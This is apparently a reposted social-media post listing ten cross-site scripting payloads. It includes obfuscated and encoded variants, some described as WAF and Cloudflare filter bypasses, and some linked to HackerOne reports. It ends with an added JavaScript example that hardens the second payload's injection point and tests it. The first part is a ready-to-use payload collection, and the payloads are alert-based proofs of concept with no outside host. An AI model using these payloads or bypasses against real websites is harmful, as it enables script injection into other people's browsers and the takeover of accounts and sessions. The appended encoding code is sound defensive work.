tgoop.com/pythonwithmedev/417
10 XSS payloads that may come in handy:
1=> ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
hackerone.com/reports/2433634
2=> ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
hackerone.com/reports/846338
The payload finishes the open function calls from jQuery, executes an alert as a PoC, and then finishes the original script tag
3=> <a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
WAF / Cloudflare Bypass
4=> ”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores
hackerone.com/reports/484434
filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the
5=> <a href=[ ]" onmouseover=prompt(1)//">XYZ</a>
6=> <script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/
7=> <blink/ onmouseover=prompt(1)>OnMouseOver
Firefox & Opera
8=> <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
9=> <script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>
10=> jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>"'alert(1)
BY 🧑💻Cyber.vision🧑💻
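
For item 2, where the reflected utm_source value closes the surrounding script code and the script tag, here is the encoding step that keeps such a value inert. This is an added example, not code from the original post or the HackerOne report; the variable name utmSource and the inline-script template are assumptions.

```javascript
// Added example. Sample input is the query string from item 2 of the list.
const SAMPLE_QUERY =
  "utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e";

// Decode one query parameter the way a server framework would ('+' becomes a space).
function decodeParam(query, name) {
  return new URLSearchParams(query).get(name);
}

// Weak form (assumed shape): the raw value is concatenated into an inline script.
function renderUnsafe(value) {
  return "<script>var utmSource = `" + value + "`;</script>";
}

// Hardened form: serialize as a JSON string literal, then escape the characters
// that matter to the HTML parser (<, >, &) and the line separators U+2028/U+2029.
// The result is a double-quoted JS literal, so backticks inside it are plain data.
function toInlineScriptLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

function renderSafe(value) {
  return "<script>var utmSource = " + toInlineScriptLiteral(value) + ";</script>";
}

// Number of script end tags the HTML parser would see in the rendered markup.
// Exactly one is expected: the template's own closing tag.
function scriptCloseCount(html) {
  return (html.match(/<\/script/gi) || []).length;
}

const value = decodeParam(SAMPLE_QUERY, "utm_source");
console.log("decoded value      :", value);
console.log("unsafe close tags  :", scriptCloseCount(renderUnsafe(value)));
console.log("hardened close tags:", scriptCloseCount(renderSafe(value)));
console.log("hardened markup    :", renderSafe(value));
```

The same check (one script end tag per rendered block, value round-trips through JSON.parse) works as a regression test for any template that reflects request data into inline script.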
